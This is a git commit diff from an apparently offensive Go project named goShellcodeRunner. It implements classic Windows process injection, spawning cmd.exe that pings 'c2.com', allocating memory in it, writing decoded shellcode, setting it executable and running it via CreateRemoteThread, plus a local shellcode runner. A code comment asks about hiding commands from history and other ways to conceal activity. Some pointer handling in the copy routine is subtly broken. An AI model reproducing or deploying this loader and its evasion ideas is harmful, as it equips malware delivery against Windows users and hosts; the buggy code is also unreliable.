Fixed remote process memory allocations bug, Removed redundant OpenProcess(), Added ChangeRemoteProcessPermission(), CreateRemoteThread()

Author: MasoudAbdaal

DLL/index.go

@@ -2,8 +2,10 @@ package dll
 
 import "syscall"
 
+// TODO: Refactor all function to use New_kernel32()
 var (
-	Kernel32 *syscall.LazyDLL = syscall.NewLazyDLL("kernel32.dll")
-	Use32dll *syscall.LazyDLL = syscall.NewLazyDLL("User32.dll")
-	NtDll    *syscall.LazyDLL = syscall.NewLazyDLL("ntdll.dll")
+	New_kernel32 kernel32DLL
+	Kernel32     *syscall.LazyDLL = syscall.NewLazyDLL("kernel32.dll")
+	Use32dll     *syscall.LazyDLL = syscall.NewLazyDLL("User32.dll")
+	NtDll        *syscall.LazyDLL = syscall.NewLazyDLL("ntdll.dll")
 )

DLL/kernel32.go

@@ -0,0 +1,33 @@
+package dll
+
+import (
+	"syscall"
+)
+
+// TradeOff: While you using struct and methods, you should define a constructor for it
+// Every time you want to use Kernel32, you have to New() it & it takes more memory area in comparesion of use:
+// var Kernel32 *syscall.LazyDLL = syscall.NewLazyDLL("kernel32.dll")
+type kernel32DLL struct {
+}
+
+func (k *kernel32DLL) newKernel32DLL() *kernel32DLL {
+	return k
+}
+
+func (*kernel32DLL) VirtualAllocEx(
+	processHandle *syscall.Handle,
+	memorySize int,
+	allocationType int,
+	regionProtections int) (address uintptr, lastError error) {
+
+	proc := Kernel32.NewProc("VirtualAllocEx")
+
+	addr, _, lastErr := proc.Call(uintptr(*processHandle),
+		uintptr(0),
+		uintptr(memorySize),
+		uintptr(allocationType),
+		uintptr(regionProtections),
+	)
+
+	return addr, lastErr
+}

HeapWalk/heapwalk.go

@@ -21,7 +21,7 @@ func GetProcessHeap() {
 
 	heapHandle, _, lastErr := procGetProcessHeap.Call()
 	if lastErr == windows.NTE_OP_OK {
-
+		// TODO: complete process heap walk.
 	}
 
 	var heapEntry PROCESS_HEAP_ENTRY

Process/cmd.go

@@ -12,6 +12,10 @@ import (
 const PROCESS_ALL_ACCESS = windows.STANDARD_RIGHTS_REQUIRED | windows.SYNCHRONIZE | 0xFFFF
 
 func CreateCmdProcess() syscall.Handle {
+	// TODO: In Bash, when you add a SPACE before your command, it hides from history!
+	// How can I do the same in cmd or Powershell?
+	// What other techniques is there for hide ourself?
+	// https://www.linkedin.com/posts/activity-7290113056188112898-RBXE?utm_source=share&utm_medium=member_desktop&rcm=ACoAADR0WIUBHui16sjo_P6svUUR2yJg4DCoe7w
 	cmdPtr, err := syscall.UTF16PtrFromString("C:\\Windows\\System32\\cmd.exe")
 	cmdArgPtr, err2 := syscall.UTF16FromString(" /c ping /t c2.com")
 
@@ -36,7 +40,9 @@ func CreateCmdProcess() syscall.Handle {
 		// CREATE_UNICODE_ENVIRONMENT = 0x00000400
 		// DEBUG_PROCESS = 0x00000001
 		// https://learn.microsoft.com/en-us/windows/win32/procthread/process-creation-flags#flags
-		0x00000800, nil, nil,
+
+		// Used NewConsole for debuggging and end process!
+		0x00000010, nil, nil,
 		&startupInfo,
 		&procInfo)
 
@@ -48,14 +54,22 @@ func CreateCmdProcess() syscall.Handle {
 
 	log.Printf("[PROC] Try To Make A Handle From PID(%v) (cmd.exe) \n", procInfo.ProcessId)
 
-	pHandle, err := syscall.OpenProcess(PROCESS_ALL_ACCESS, false, procInfo.ProcessId)
+	// createHandle_Old contents....
 
-	if err != nil {
+	log.Printf("[PROC] Handle From PID(%v) = %v \n", procInfo.ProcessId, procInfo.Process)
 
-		log.Panicf("[PROC] Error While Getting Handle \"%v\" \n", err)
-	}
+	return procInfo.Process
+}
 
-	log.Printf("[PROC] Handle From PID(%v) = %v \n", procInfo.ProcessId, pHandle)
+// func createHandle_Old() {
+// 	pHandle, err := syscall.OpenProcess(PROCESS_ALL_ACCESS, false, procInfo.ProcessId)
 
-	return pHandle
-}
+// 	if err != nil {
+
+// 		log.Panicf("[PROC] Error While Getting Handle \"%v\" \n", err)
+// 	}
+
+// 	log.Printf("[PROC] Handle From PID(%v) = %v \n", procInfo.ProcessId, pHandle)
+
+// 	return pHandle
+// }

Shellcode/calculator.go

@@ -16,11 +16,11 @@ func ExecuteCalculator() {
 
 	shellAddr, shellSrc := AllocateShellcode()
 
-	CopyShellcodeToMemory(&shellAddr, &shellSrc)
+	CopyShellcodeToMemory(shellAddr, &shellSrc)
 
 	ChangeShellcodeMemoryToRX(&shellAddr, len(shellSrc))
 
-	tHandle := CreateThread(&shellAddr)
+	tHandle := CreateThread(shellAddr)
 
 	RunShellcode(&tHandle)
 	log.Print("[SHELL] Shellcode Executed Successfully\n")
@@ -46,16 +46,19 @@ func AllocateShellcode() (uintptr, []byte) {
 	return shellAddr, shellCodeSrc
 }
 
-func CopyShellcodeToMemory(shellcodeAddr *uintptr, shellCodeSrc *[]byte) {
+func CopyShellcodeToMemory(destAddr uintptr, shellCodeSrc *[]byte) {
 
 	procRtlMoveMemory := dll.NtDll.NewProc("RtlMoveMemory")
 
-	procRtlMoveMemory.Call(*shellcodeAddr,
+	procRtlMoveMemory.Call(
+
+		uintptr(unsafe.Pointer(&destAddr)),
 		// 1. Dereference Before Indexing
 		// 2. Pointer to First Element
 		uintptr(unsafe.Pointer(&(*shellCodeSrc)[0])),
 		uintptr(len(*shellCodeSrc)))
-	log.Printf("[+] Shellcode Wrote Done 0x[%v] \n", shellcodeAddr)
+
+	log.Printf("[+] Shellcode Wrote Done 0x[%v] \n", destAddr)
 }
 
 func ChangeShellcodeMemoryToRX(shellcodeAddr *uintptr, shellCodeSrcLen int) {
@@ -72,14 +75,14 @@ func ChangeShellcodeMemoryToRX(shellcodeAddr *uintptr, shellCodeSrcLen int) {
 	log.Printf("[+] Shellcode Memory Permissions Changed To R-X \n")
 }
 
-func CreateThread(shellAddr *uintptr) uintptr {
+func CreateThread(shellAddr uintptr) uintptr {
 
 	procCreateThread := dll.Kernel32.NewProc("CreateThread")
 
 	tHandle, _, lastErr := procCreateThread.Call(
 		uintptr(0),
 		uintptr(0),
-		*shellAddr,
+		shellAddr,
 		uintptr(0),
 		uintptr(0),
 		uintptr(0))

Shellcode/injection.go

@@ -1,22 +1,31 @@
 package shellcode
 
 import (
+	"encoding/hex"
 	dll "goShellcodeRunner/DLL"
 	process "goShellcodeRunner/Process"
 	"log"
+	"syscall"
+	"unsafe"
 
 	"golang.org/x/sys/windows"
 )
 
 func ClassicInjection() {
 	cmdHandle := process.CreateCmdProcess()
 
+	// TODO: 1. WriteProcessMemory() Also Can Use CopyShellcodeToMemory()
+	shellcode, unhandledErr := hex.DecodeString(HexShellcode)
+	if unhandledErr != nil {
+		log.Panicf(" unhandledErr \n")
+	}
+
 	procVirtualAllocEx := dll.Kernel32.NewProc("VirtualAllocEx")
 
 	addr, _, lastErr := procVirtualAllocEx.Call(
 		uintptr(cmdHandle),
 		uintptr(0),
-		uintptr(len(HexShellcode)),
+		uintptr(len(shellcode)),
 		uintptr(windows.MEM_COMMIT|windows.MEM_RESERVE),
 		uintptr(windows.PAGE_READWRITE))
 
@@ -26,7 +35,45 @@ func ClassicInjection() {
 
 	log.Printf("[INJECT] Memory Allocation Done, Address: 0x(%x)", addr)
 
-	// TODO: 1. WriteProcessMemory() Also Can Use CopyShellcodeToMemory()
-	// 2. VirtualProtectEx()
-	// 3. CreateThread()
+	CopyShellcodeToMemory(addr, &shellcode)
+
+	log.Printf("[INJECT] Shellcode Moved To Process Memory \n")
+
+	ChangeRemoteProcessPermission(windows.Handle(cmdHandle), addr, len(shellcode), windows.PAGE_EXECUTE_READ)
+
+	CreateRemoteThread(cmdHandle, addr)
+
+}
+
+func ChangeRemoteProcessPermission(pHandle windows.Handle, addr uintptr, size int, newProtect uint32) {
+	var oldProted uint32
+
+	err := windows.VirtualProtectEx(pHandle, addr, uintptr(size), newProtect, &oldProted)
+
+	if err != nil {
+		log.Panicf("[INJECT] Error While Change RemoteProcess MemoryProtect (%v) \n", err)
+
+	}
+
+}
+
+func CreateRemoteThread(pHandle syscall.Handle, addr uintptr) {
+	procCreateRemoteThread := dll.Kernel32.NewProc("CreateRemoteThread")
+
+	var threadId uint32 = 0
+
+	tHandle, _, lastErr := procCreateRemoteThread.Call(
+		uintptr(pHandle),
+		uintptr(0),
+		uintptr(0),
+		addr,
+		uintptr(0),
+		uintptr(0),
+		uintptr(unsafe.Pointer(&threadId)))
+
+	if tHandle == 0 {
+		log.Panicf("[INJECT] Error While Creating Remote Thraed (%v) \n", lastErr)
+
+	}
+	log.Printf("[INJECT] Shellcode Execution Done! %v \n", tHandle)
 }

main.go

@@ -8,7 +8,7 @@ import (
 func main() {
 	heapwalk.GetProcessHeap()
 
-	shellcode.ClassicInjection()
+	// shellcode.ExecuteCalculator()
 
-	shellcode.ExecuteCalculator()
+	shellcode.ClassicInjection()
 }